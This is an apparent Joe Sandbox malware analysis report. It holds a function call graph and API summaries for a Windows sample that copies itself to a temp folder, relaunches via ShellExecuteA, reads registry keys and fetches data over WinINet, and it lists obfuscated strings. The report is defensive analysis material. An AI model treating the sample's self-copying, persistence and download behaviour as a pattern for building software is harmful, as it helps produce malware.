cc5900 __dosmaperr 14 API calls 24527->24530 24531 cce503 24528->24531 24572 cc7d77 25 API calls 2 library calls 24528->24572 24533 cce4a5 24530->24533 24531->24451 24531->24452 24532 cce4fe 24532->24531 24535 cc7001 __wsopen_s 11 API calls 24532->24535 24571 cc6fd4 25 API calls __wsopen_s 24533->24571 24536 cce587 24535->24536 24538 cca286 ___scrt_is_nonwritable_in_current_image 24537->24538 24574 cc8253 EnterCriticalSection 24538->24574 24540 cca2b2 24578 cca054 15 API calls 3 library calls 24540->24578 24544 cca28d 24544->24540 24546 cca321 EnterCriticalSection 24544->24546 24549 cca2d4 24544->24549 24545 cca2b7 24545->24549 24579 cca1a2 EnterCriticalSection 24545->24579 24548 cca32e LeaveCriticalSection 24546->24548 24546->24549 24548->24544 24575 cca384 24549->24575 24550->24468 24551->24455 24552->24462 24553->24474 24554->24455 24555->24472 24556->24476 24557->24482 24558->24494 24559->24481 24560->24489 24561->24492 24562->24494 24565 cce3b6 24563->24565 24564 cce3d1 24564->24527 24565->24564 24566 cc5900 __dosmaperr 14 API calls 24565->24566 24567 cce3f5 24566->24567 24573 cc6fd4 25 API calls __wsopen_s 24567->24573 24569 cce400 24569->24527 24570->24522 24571->24528 24572->24532 24573->24569 24574->24544 24580 cc829b LeaveCriticalSection 24575->24580 24577 cca2f4 24577->24457 24577->24458 24578->24545 24579->24549 24580->24577 22496 cc295d 22501 cc2c65 SetUnhandledExceptionFilter 22496->22501 22498 cc2962 22502 cc7fde 25 API calls 2 library calls 22498->22502 22500 cc296d 22501->22498 22502->22500 22637 cc296f 22638 cc297b ___scrt_is_nonwritable_in_current_image 22637->22638 22663 cc2695 22638->22663 22640 cc2982 22641 cc2adb 22640->22641 22649 cc29ac ___scrt_is_nonwritable_in_current_image __fassign ___scrt_release_startup_lock 22640->22649 22691 cc2b00 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 22641->22691 22643 cc2ae2 22692 cc4baf 23 API calls __fassign 22643->22692 22645 cc2ae8 22693 cc4b73 23 API calls __fassign 22645->22693 22647 cc2af0 22648 cc29cb 22649->22648 22652 cc2a4c 22649->22652 22690 cc4b89 37 API calls 3 library calls 22649->22690 22671 cc77d3 22652->22671 22653 cc2a52 22675 cc1070 22653->22675 22664 cc269e 22663->22664 22694 cc2ced IsProcessorFeaturePresent 22664->22694 22666 cc26aa 22695 cc32ac 10 API calls 2 library calls 22666->22695 22668 cc26af 22670 cc26b3 22668->22670 22696 cc32cb 7 API calls 2 library calls 22668->22696 22670->22640 22672 cc77dc 22671->22672 22673 cc77e1 22671->22673 22697 cc7537 22672->22697 22673->22653 22749 cb8570 22675->22749 22690->22652 22691->22643 22692->22645 22693->22647 22694->22666 22695->22668 22696->22670 22698 cc7540 22697->22698 22702 cc7556 22697->22702 22698->22702 22703 cc7563 22698->22703 22700 cc754d 22700->22702 22716 cc76b5 15 API calls 3 library calls 22700->22716 22702->22673 22704 cc756c 22703->22704 22705 cc756f 22703->22705 22704->22700 22717 ccc5e7 22705->22717 22711 cc8951 _free 14 API calls 22713 cc75b0 22711->22713 22712 cc758c 22714 cc8951 _free 14 API calls 22712->22714 22713->22700 22715 cc7581 22714->22715 22715->22711 22716->22702 22718 cc7576 22717->22718 22719 ccc5f0 22717->22719 22723 ccc988 GetEnvironmentStringsW 22718->22723 22736 cc92ff 37 API calls 3 library calls 22719->22736 22721 ccc613 22737 ccc42e 47 API calls 4 library calls 22721->22737 22724 ccc99f 22723->22724 22734 ccc9f5 22723->22734 22738 ccc8a4 22724->22738 22725 ccc9fe FreeEnvironmentStringsW 22726 cc757b 22725->22726 22726->22715 22735 cc75b6 25 API calls 4 library calls 22726->22735 22728 ccc9b8 22728->22734 22741 cc8e3a 22728->22741 22731 ccc8a4 __cftof WideCharToMultiByte 22733 ccc9e0 22731->22733 22732 cc8951 _free 14 API calls 22732->22734 22733->22732 22734->22725 22734->22726 22735->22712 22736->22721 22737->22718 22740 ccc8bd WideCharToMultiByte 22738->22740 22740->22728 22742 cc8e78 22741->22742 22746 cc8e48 __dosmaperr 22741->22746 22743 cc5900 __dosmaperr 14 API calls 22742->22743 22745 cc8e76 22743->22745 22744 cc8e63 RtlAllocateHeap 22744->22745 22744->22746 22745->22731 22745->22733 22746->22742 22746->22744 22748 cc704f EnterCriticalSection LeaveCriticalSection __dosmaperr 22746->22748 22748->22746 22750 cb89d0 22749->22750 22751 cb8587 22749->22751 22824 cb6cc0 CreateMutexA GetLastError 22750->22824 22828 cb4210 22751->22828 22753 cb85b0 22754 cb8703 22753->22754 22757 cb85cb GetTempPathA 22753->22757 22755 cc1350 27 API calls 22754->22755 22756 cb8712 22755->22756 22758 cb2b70 56 API calls 22756->22758 22759 cb85f8 22757->22759 22760 cb871a 22758->22760 22759->22759 22762 cc16c0 27 API calls 22759->22762 22913 cb5140 57 API calls 22760->22913 22764 cb8611 22762->22764 22763 cb8727 22765 cc1800 27 API calls 22763->22765 22766 cc1350 27 API calls 22764->22766 22767 cb8734 22765->22767 22768 cb8620 22766->22768 22769 cc11b0 25 API calls 22767->22769 22770 cb2b70 56 API calls 22768->22770 22778 cb8640 22769->22778 22771 cb8628 22770->22771 22905 cc1800 22771->22905 22773 cb8634 22775 cc11b0 25 API calls 22773->22775 22774 cb89d5 22777 cc6fe4 25 API calls 22774->22777 22775->22778 22776 cc1350 27 API calls 22779 cb87d6 22776->22779 22780 cb89da 22777->22780 22778->22774 22778->22776 22782 cb2b70 56 API calls 22779->22782 22781 cc4c7c 28 API calls 22780->22781 22783 cb89f0 22781->22783 22784 cb87de 22782->22784 22785 cb89f7 22783->22785 22786 cb8a05 22783->22786 22914 cc1b30 27 API calls 22784->22914 22788 cc4d0a 67 API calls 22785->22788 22915 cb48e0 GetFileAttributesA 22786->22915 22791 cb89fd 22788->22791 22790 cb87f2 22793 cc1800 27 API calls 22790->22793 22963 cc4baf 23 API calls __fassign 22791->22963 22792 cb8a0d 22794 cb8a22 22792->22794 22800 cb8a1b CreateDirectoryA 22792->22800 22795 cb87ff 22793->22795 22916 cb48e0 GetFileAttributesA 22794->22916 22796 cc11b0 25 API calls 22795->22796 22806 cb880b 22796->22806 22799 cb8a9e 22800->22794 22801 cb8a2a 22802 cb8a57 22801->22802 22917 cb5240 GetModuleFileNameA 22801->22917 22922 cb48b0 68 API calls 22802->22922 22804 cb8a5f 22804->22791 22923 cc1310 27 API calls 22804->22923 22805 cb88cb GetModuleFileNameA 22808 cb8900 22805->22808 22806->22774 22806->22805 22809 cb88c1 22806->22809 22808->22808 22812 cc16c0 27 API calls 22808->22812 22809->22805 22810 cb8a41 22814 cb8a48 CopyFileA 22810->22814 22822 cb8919 22812->22822 22813 cb8a72 22815 cc1350 27 API calls 22813->22815 22921 cc1160 25 API calls 22814->22921 22817 cb8a80 22815->22817 22924 cc1310 27 API calls 22817->22924 22819 cb8a8f 22925 cb3680 22819->22925 22821 cb8a94 22821->22791 22822->22750 22822->22774 22822->22780 22823 cb89c6 22822->22823 22823->22750 22825 cb6cec 22824->22825 23096 cc4baf 23 API calls __fassign 22825->23096 22827 cb6cf3 22964 cc35b0 22828->22964 22831 cb427a 22833 cc1350 27 API calls 22831->22833 22832 cb4271 22832->22753 22834 cb4289 22833->22834 22835 cb2b70 56 API calls 22834->22835 22836 cb4291 22835->22836 22837 cc1350 27 API calls 22836->22837 22838 cb42ad 22837->22838 22839 cb2b70 56 API calls 22838->22839 22840 cb42b5 GetModuleHandleA GetProcAddress 22839->22840 22842 cb42d9 22840->22842 22843 cb4341 22842->22843 22846 cb4700 22842->22846 22844 cb4369 GetSystemInfo 22843->22844 22845 cb4365 GetNativeSystemInfo 22843->22845 22850 cb436f 22844->22850 22845->22850 22847 cc6fe4 25 API calls 22846->22847 22848 cb443e 22847->22848 22849 cc6fe4 25 API calls 22848->22849 22875 cb437a 22848->22875 22851 cb470a 22849->22851 22852 cb449a 22850->22852 22853 cb43e3 22850->22853 22850->22875 22855 cc1350 27 API calls 22852->22855 22854 cc1350 27 API calls 22853->22854 22856 cb43fe 22854->22856 22857 cb44ba 22855->22857 22858 cb2b70 56 API calls 22856->22858 22859 cb2b70 56 API calls 22857->22859 22860 cb4405 22858->22860 22861 cb44c1 22859->22861 22862 cc1350 27 API calls 22860->22862 22863 cc1350 27 API calls 22861->22863 22864 cb4416 22862->22864 22865 cb44d2 22863->22865 22866 cb2b70 56 API calls 22864->22866 22867 cb2b70 56 API calls 22865->22867 22870 cb441d 22866->22870 22868 cb44d9 22867->22868 22869 cc1350 27 API calls 22868->22869 22871 cb44fc 22869->22871 22966 cc6e05 40 API calls 22870->22966 22873 cb2b70 56 API calls 22871->22873 22874 cb4503 22873->22874 22967 cb4010 22874->22967 22875->22753 22877 cb450b 22878 cc1350 27 API calls 22877->22878 22879 cb453a 22878->22879 22880 cb2b70 56 API calls 22879->22880 22881 cb4541 22880->22881 22882 cc1350 27 API calls 22881->22882 22883 cb4552 22882->22883 22884 cb2b70 56 API calls 22883->22884 22885 cb4559 22884->22885 22886 cc1350 27 API calls 22885->22886 22887 cb457c 22886->22887 22888 cb2b70 56 API calls 22887->22888 22889 cb4583 22888->22889 22890 cb4010 75 API calls 22889->22890 22891 cb458b 22890->22891 22892 cc1350 27 API calls 22891->22892 22893 cb45ba 22892->22893 22894 cb2b70 56 API calls 22893->22894 22895 cb45c1 22894->22895 22896 cc1350 27 API calls 22895->22896 22897 cb45d2 22896->22897 22898 cb2b70 56 API calls 22897->22898 22899 cb45d9 22898->22899 22900 cc1350 27 API calls 22899->22900 22901 cb45fc 22900->22901 22902 cb2b70 56 API calls 22901->22902 22903 cb4603 22902->22903 22904 cb4010 75 API calls 22903->22904 22904->22875 22906 cc1823 22905->22906 22907 cc186d 22905->22907 22906->22907 22908 cc182c 22906->22908 22909 cc187c 22907->22909 23092 cc1d80 27 API calls 2 library calls 22907->23092 23087 cc2070 22908->23087 22909->22773 22911 cc1835 22911->22773 22913->22763 22914->22790 22915->22792 22916->22801 22918 cb5280 22917->22918 22918->22918 22919 cc16c0 27 API calls 22918->22919 22920 cb5298 22919->22920 22920->22810 22921->22802 22922->22804 22923->22813 22924->22819 22926 cb369d 22925->22926 22927 cc16c0 27 API calls 22926->22927 22928 cb36c3 ShellExecuteA 22927->22928 22930 cb372f 22928->22930 22929 cb37a9 22929->22821 22930->22929 22931 cc6fe4 25 API calls 22930->22931 22932 cb37bd 22931->22932 22933 cc1350 27 API calls 22932->22933 22934 cb37d7 22933->22934 22935 cc1350 27 API calls 22934->22935 22936 cb37e4 22935->22936 22937 cc1350 27 API calls 22936->22937 22938 cb37f1 22937->22938 22939 cc1350 27 API calls 22938->22939 22940 cb3800 22939->22940 22941 cc1350 27 API calls 22940->22941 22942 cb380f 22941->22942 22943 cc1350 27 API calls 22942->22943 22944 cb3821 22943->22944 22945 cb3680 30 API calls 22944->22945 22946 cb3826 22945->22946 22947 cb38ba 22946->22947 22948 cb38cd 22946->22948 22947->22821 22949 cc6fe4 25 API calls 22948->22949 22950 cb38d2 Sleep 22949->22950 22952 cb398b 22950->22952 22953 cc16c0 27 API calls 22952->22953 22954 cb39a4 22953->22954 22955 cc16c0 27 API calls 22954->22955 22956 cb39bd 22955->22956 22957 cc16c0 27 API calls 22956->22957 22958 cb39d6 CreateThread Sleep 22957->22958 22959 cb3a03 22958->22959 23094 cb37c0 34 API calls 22958->23094 22960 cb3aa9 22959->22960 22961 cc6fe4 25 API calls 22959->22961 22960->22821 22962 cb3abd 22961->22962 22963->22799 22965 cb4253 GetVersionExW 22964->22965 22965->22831 22965->22832 22966->22848 22971 cb413d 22967->22971 22975 cb402f 22967->22975 22968 cb4200 23051 cc17f0 22968->23051 22970 cc16c0 27 API calls 22970->22975 22973 cb41dd 22971->22973 22974 cc6fe4 25 API calls 22971->22974 22973->22877 22974->22968 22975->22968 22975->22970 22975->22971 23054 cc23ea 23051->23054 23069 cc235e 26 API calls std::exception::exception 23054->23069 23056 cc23fb 23070 cc3240 RaiseException 23056->23070 23058 cc2409 23071 cc2431 InitializeCriticalSectionAndSpinCount GetModuleHandleW 23058->23071 23060 cc240f 23083 cc26ce 4 API calls 2 library calls 23060->23083 23062 cc2416 23063 cc2429 23062->23063 23064 cc241b 23062->23064 23085 cc2b00 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23063->23085 23084 cc285b 28 API calls 23064->23084 23067 cc17fa 23068 cc2430 23069->23056 23070->23058 23072 cc2454 GetModuleHandleW 23071->23072 23073 cc2465 GetProcAddress GetProcAddress 23071->23073 23072->23073 23074 cc24ab 23072->23074 23075 cc2495 CreateEventW 23073->23075 23076 cc2483 23073->23076 23086 cc2b00 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23074->23086 23075->23074 23077 cc2487 23075->23077 23076->23075 23076->23077 23077->23060 23079 cc24b2 DeleteCriticalSection 23081 cc24ce 23079->23081 23082 cc24c7 CloseHandle 23079->23082 23081->23060 23082->23081 23083->23062 23084->23067 23085->23068 23086->23079 23088 cc2084 23087->23088 23091 cc2095 __wsopen_s 23088->23091 23093 cc2130 27 API calls 2 library calls 23088->23093 23090 cc211b 23090->22911 23091->22911 23092->22909 23093->23090 23095 cb37c0 34 API calls 23094->23095 23096->22827 22503 cb7909 22504 cb7913 22503->22504 22506 cb7ba2 22503->22506 22505 cc16c0 27 API calls 22504->22505 22507 cb7944 22505->22507 22509 cb7c33 22506->22509 22512 cc6fe4 25 API calls 22506->22512 22508 cc1350 27 API calls 22507->22508 22510 cb7953 22508->22510 22511 cb2b70 56 API calls 22510->22511 22514 cb795b 22511->22514 22513 cb7c51 22512->22513 22515 cc16c0 27 API calls 22514->22515 22523 cb79ba 22514->22523 22516 cb79a3 22515->22516 22517 cc1350 27 API calls 22516->22517 22518 cb79b2 22517->22518 22521 cb2b70 56 API calls 22518->22521 22519 cb7c42 22522 cc6fe4 25 API calls 22519->22522 22520 cb7abd 22526 cc1350 27 API calls 22520->22526 22544 cb7b75 22520->22544 22521->22523 22525 cb7c47 22522->22525 22523->22519 22523->22520 22525->22506 22528 cc6fe4 25 API calls 22525->22528 22529 cb7ae4 22526->22529 22528->22506 22532 cb2b70 56 API calls 22529->22532 22530 cb7b9c 22562 cc4d0a 22530->22562 22531 cb7ba7 22535 cc1350 27 API calls 22531->22535 22533 cb7aec 22532->22533 22553 cc18f0 22533->22553 22537 cb7bb5 22535->22537 22539 cc1350 27 API calls 22537->22539 22538 cb7af9 22557 cc11b0 22538->22557 22541 cb7bc3 22539->22541 22548 cb7050 22541->22548 22543 cb7b05 22543->22525 22543->22544 22545 cc4c7c 22544->22545 22575 cc4bc5 22545->22575 22549 cb7341 22548->22549 22550 cb73ab 22549->22550 22551 cc6fe4 25 API calls 22549->22551 22550->22506 22552 cb73cd 22551->22552 22554 cc1905 22553->22554 22555 cc1919 22554->22555 22632 cc1d80 27 API calls 2 library calls 22554->22632 22555->22538 22558 cc11be 22557->22558 22559 cc11e1 22557->22559 22558->22559 22560 cc6fe4 25 API calls 22558->22560 22559->22543 22561 cc122c 22560->22561 22563 cc4d16 ___scrt_is_nonwritable_in_current_image 22562->22563 22564 cc4d35 22563->22564 22565 cc4d20 22563->22565 22571 cc4d30 22564->22571 22634 cc83f7 EnterCriticalSection 22564->22634 22566 cc5900 __dosmaperr 14 API calls 22565->22566 22567 cc4d25 22566->22567 22633 cc6fd4 25 API calls __wsopen_s 22567->22633 22570 cc4d52 22635 cc4c93 65 API calls 4 library calls 22570->22635 22571->22506 22573 cc4d5d 22636 cc4d84 LeaveCriticalSection ___scrt_uninitialize_crt 22573->22636 22578 cc4bd1 ___scrt_is_nonwritable_in_current_image 22575->22578 22576 cc4bd8 22577 cc5900 __dosmaperr 14 API calls 22576->22577 22579 cc4bdd 22577->22579 22578->22576 22580 cc4bf8 22578->22580 22600 cc6fd4 25 API calls __wsopen_s 22579->22600 22582 cc4bfd 22580->22582 22583 cc4c0a 22580->22583 22584 cc5900 __dosmaperr 14 API calls 22582->22584 22592 cc841f 22583->22592 22591 cb7b95 22584->22591 22587 cc4c1a 22588 cc5900 __dosmaperr 14 API calls 22587->22588 22588->22591 22589 cc4c27 22601 cc4c65 LeaveCriticalSection ___scrt_uninitialize_crt 22589->22601 22591->22530 22591->22531 22593 cc842b ___scrt_is_nonwritable_in_current_image 22592->22593 22602 cc8253 EnterCriticalSection 22593->22602 22595 cc8439 22603 cc84c3 22595->22603 22600->22591 22601->22591 22602->22595 22604 cc84e6 22603->22604 22605 cc853e 22604->22605 22612 cc8446 22604->22612 22620 cc83f7 EnterCriticalSection 22604->22620 22621 cc840b LeaveCriticalSection 22604->22621 22622 ccb858 14 API calls __dosmaperr 22605->22622 22608 cc8547 22623 cc8951 22608->22623 22610 cc8550 22610->22612 22629 cc9801 6 API calls __dosmaperr 22610->22629 22617 cc847f 22612->22617 22613 cc856f 22630 cc83f7 EnterCriticalSection 22613->22630 22616 cc8582 22616->22612 22631 cc829b LeaveCriticalSection 22617->22631 22619 cc4c13 22619->22587 22619->22589 22620->22604 22621->22604 22622->22608 22624 cc895c HeapFree 22623->22624 22628 cc8985 __dosmaperr 22623->22628 22625 cc8971 22624->22625 22624->22628 22626 cc5900 __dosmaperr 12 API calls 22625->22626 22627 cc8977 GetLastError 22626->22627 22627->22628 22628->22610 22629->22613 22630->22616 22631->22619 22632->22555 22633->22571 22634->22570 22635->22573 22636->22571 24872 cca504 24873 cca6a7 24872->24873 24875 cca52e 24872->24875 24874 cc5900 __dosmaperr 14 API calls 24873->24874 24891 cca692 24874->24891 24875->24873 24878 cca579 24875->24878 24876 cc308c _ValidateLocalCookies 5 API calls 24877 cca6c4 24876->24877 24893 cd009c 24878->24893 24882 cca5ad 24883 cca6c6 24882->24883 24908 ccf8d5 24882->24908 24885 cc7001 __wsopen_s 11 API calls 24883->24885 24887 cca6d2 24885->24887 24886 cca5bf 24886->24883 24915 ccf901 24886->24915 24889 cca5d1 24889->24883 24890 cca5da 24889->24890 24890->24891 24922 cd00f9 25 API calls 2 library calls 24890->24922 24891->24876 24894 cd00a8 ___scrt_is_nonwritable_in_current_image 24893->24894 24895 cca599 24894->24895 24923 cc8253 EnterCriticalSection 24894->24923 24901 ccf8a9 24895->24901 24897 cd00b9 24898 cd00cd 24897->24898 24924 ccffbe 24897->24924 24942 cd00f0 LeaveCriticalSection ___scrt_uninitialize_crt 24898->24942 24902 ccf8ca 24901->24902 24903 ccf8b5 24901->24903 24902->24882 24904 cc5900 __dosmaperr 14 API calls 24903->24904 24905 ccf8ba 24904->24905 25050 cc6fd4 25 API calls __wsopen_s 24905->25050 24907 ccf8c5 24907->24882 24909 ccf8f6 24908->24909 24910 ccf8e1 24908->24910 24909->24886 24911 cc5900 __dosmaperr 14 API calls 24910->24911 24912 ccf8e6 24911->24912 25051 cc6fd4 25 API calls __wsopen_s 24912->25051 24914 ccf8f1 24914->24886 24916 ccf90d 24915->24916 24917 ccf922 24915->24917 24918 cc5900 __dosmaperr 14 API calls 24916->24918 24917->24889 24919 ccf912 24918->24919 25052 cc6fd4 25 API calls __wsopen_s 24919->25052 24921 ccf91d 24921->24889 24922->24891 24923->24897 24926 cd000a 24924->24926 24925 cd0011 24928 cd0081 24925->24928 24930 cd0078 24925->24930 24926->24925 24927 cc8e3a __wsopen_s 15 API calls 24926->24927 24932 cd0029 24927->24932 24935 cd007e 24928->24935 25005 ccfe62 24928->25005 24943 ccfc87 24930->24943 24931 cc8951 _free 14 API calls 24936 cd008c 24931->24936 24933 cd0030 24932->24933 24939 cd0056 24932->24939 24938 cc8951 _free 14 API calls 24933->24938 24935->24931 24937 cc308c _ValidateLocalCookies 5 API calls 24936->24937 24940 cd009a 24937->24940 24938->24925 24941 cc8951 _free 14 API calls 24939->24941 24940->24898 24941->24925 24942->24895 24944 ccfc96 24943->24944 24945 ccf901 25 API calls 24944->24945 24946 ccfcac 24945->24946 24947 ccfe31 24946->24947 24948 ccf8a9 25 API calls 24946->24948 24949 cc7001 __wsopen_s 11 API calls 24947->24949 25002 ccfe38 24947->25002 24951 ccfcbe 24948->24951 24952 ccfe61 24949->24952 24950 cc8951 _free 14 API calls 24953 ccfd0e 24950->24953 24951->24947 24951->24950 24951->25002 24954 ccf901 25 API calls 24952->24954 24959 cc8e3a __wsopen_s 15 API calls 24953->24959 24955 ccfe87 24954->24955 24956 ccffb2 24955->24956 24957 ccf8a9 25 API calls 24955->24957 24958 cc7001 __wsopen_s 11 API calls 24956->24958 24960 ccfe99 24957->24960 24965 ccffbc 24958->24965 24961 ccfd26 24959->24961 24960->24956 24963 ccf8d5 25 API calls 24960->24963 24962 cc8951 _free 14 API calls 24961->24962 24968 ccfd32 24962->24968 24964 ccfeab 24963->24964 24964->24956 24966 ccfeb4 24964->24966 24970 cc8e3a __wsopen_s 15 API calls 24965->24970 24989 cd0011 24965->24989 24967 cc8951 _free 14 API calls 24966->24967 24969 ccfebf GetTimeZoneInformation 24967->24969 24968->25002 25042 cc80ae 25 API calls 2 library calls 24968->25042 24982 ccfedb 24969->24982 24993 ccff76 24969->24993 24983 cd0029 24970->24983 24971 cd0081 24973 cd007e 24971->24973 24974 ccfe62 42 API calls 24971->24974 24977 cc8951 _free 14 API calls 24973->24977 24974->24973 24975 cd0078 24979 ccfc87 42 API calls 24975->24979 24976 ccfd5c 24976->24947 25043 cd2144 25 API calls 2 library calls 24976->25043 24981 cd008c 24977->24981 24978 cd0030 24985 cc8951 _free 14 API calls 24978->24985 24979->24973 24984 cc308c _ValidateLocalCookies 5 API calls 24981->24984 25048 ccd1ac 37 API calls __fassign 24982->25048 24983->24978 24987 cd0056 24983->24987 24988 cd009a 24984->24988 24985->24989 24991 cc8951 _free 14 API calls 24987->24991 24988->24935 24989->24971 24989->24975 24990 ccff2e 24992 ccc8a4 __cftof WideCharToMultiByte 24990->24992 24991->24989 24995 ccff47 24992->24995 24993->24935 24994 ccfd75 24994->24947 25044 cc6e05 40 API calls 24994->25044 24997 ccc8a4 __cftof WideCharToMultiByte 24995->24997 24997->24993 24998 ccfd9a 24999 ccfdf0 24998->24999 25045 cc6e05 40 API calls 24998->25045 24999->25002 25047 cd2144 25 API calls 2 library calls 24999->25047 25001 ccfdc1 25001->24999 25046 cc6e05 40 API calls 25001->25046 25002->24935 25006 ccfe71 25005->25006 25007 ccf901 25 API calls 25006->25007 25008 ccfe87 25007->25008 25009 ccffb2 25008->25009 25010 ccf8a9 25 API calls 25008->25010 25011 cc7001 __wsopen_s 11 API calls 25009->25011 25012 ccfe99 25010->25012 25015 ccffbc 25011->25015 25012->25009 25013 ccf8d5 25 API calls 25012->25013 25014 ccfeab 25013->25014 25014->25009 25016 ccfeb4 25014->25016 25019 cc8e3a __wsopen_s 15 API calls 25015->25019 25035 cd0011 25015->25035 25017 cc8951 _free 14 API calls 25016->25017 25018 ccfebf GetTimeZoneInformation 25017->25018 25028 ccfedb 25018->25028 25039 ccff76 25018->25039 25029 cd0029 25019->25029 25020 cd0081 25021 cd007e 25020->25021 25022 ccfe62 42 API calls 25020->25022 25024 cc8951 _free 14 API calls 25021->25024 25022->25021 25023 cd0078 25026 ccfc87 42 API calls 25023->25026 25027 cd008c 25024->25027 25025 cd0030 25031 cc8951 _free 14 API calls 25025->25031 25026->25021 25030 cc308c _ValidateLocalCookies 5 API calls 25027->25030 25049 ccd1ac 37 API calls __fassign 25028->25049 25029->25025 25033 cd0056 25029->25033 25034 cd009a 25030->25034 25031->25035 25037 cc8951 _free 14 API calls 25033->25037 25034->24935 25035->25020 25035->25023 25036 ccff2e 25038 ccc8a4 __cftof WideCharToMultiByte 25036->25038 25037->25035 25040 ccff47 25038->25040 25039->24935 25041 ccc8a4 __cftof WideCharToMultiByte 25040->25041 25041->25039 25042->24976 25043->24994 25044->24998 25045->25001 25046->24999 25047->24947 25048->24990 25049->25036 25050->24907 25051->24914 25052->24921
                                                                                                APIs
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
                                                                                                  • Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
                                                                                                  • Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
                                                                                                • InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CBE574
                                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CBE591
                                                                                                • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 00CBE5A5
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CBE5B0
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CBE5B5
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CBE5C4
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CBE5C9
                                                                                                • Sleep.KERNEL32(00001388,?,?,?,?), ref: 00CBE60A
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBF2F6
                                                                                                  • Part of subcall function 00CC16C0: Concurrency::cancel_current_task.LIBCPMT ref: 00CC17E1
                                                                                                  • Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$Close$Handle$Open$Concurrency::cancel_current_task$FileQueryReadSleepValueXinvalid_argumentstd::_
                                                                                                • String ID: 0xH3aDfoQl==$0xH3aHDZQn4=$2xCA$5120$853321935212$NSRn$OJq=$ON8o$Otu=$Ownv$invalid stoi argument$stoi argument out of range$xm==$zoiu
                                                                                                • API String ID: 4067979168-1731373691
                                                                                                • Opcode ID: 965b0d90643948c2a57ed07ec66eef97f49c26d92ab76d4c207b8599d92ade42
                                                                                                • Instruction ID: 287be446ed5b85b91e8b0c3686f35d249731fc9dc9ef7d61760c28bedeb3b0ec
                                                                                                • Opcode Fuzzy Hash: 965b0d90643948c2a57ed07ec66eef97f49c26d92ab76d4c207b8599d92ade42
                                                                                                • Instruction Fuzzy Hash: C9921471A00104ABDF08EF78CC86BED7B76AF42744F54425CF815972D2DB35DA868B92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0MGb$853321935212$937693$BoU7MQ==$EwC+$EwG+$xm==$ycHwNQ==$ycZCNQ==$ycZqNQ==$ycn5NQ==$ycv5NQ==$ycvBNQ==$yczsNQ==$ydDnNQ==$ydLxNQ==$ydPCNQ==$ydrmNQ==
                                                                                                • API String ID: 0-597702700
                                                                                                • Opcode ID: 34e92c7631094996d4f5637ff46b1b41d3d01b82463503efc2f3914402158bc2
                                                                                                • Instruction ID: 84a275388964de665875ba2180271b76a794305fdcf7555f7ce04ff49d2eccf3
                                                                                                • Opcode Fuzzy Hash: 34e92c7631094996d4f5637ff46b1b41d3d01b82463503efc2f3914402158bc2
                                                                                                • Instruction Fuzzy Hash: 93F22771A001149BEB18DB38CC89BDDBB76AF82304F64829CE449973D6DB35DEC68B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
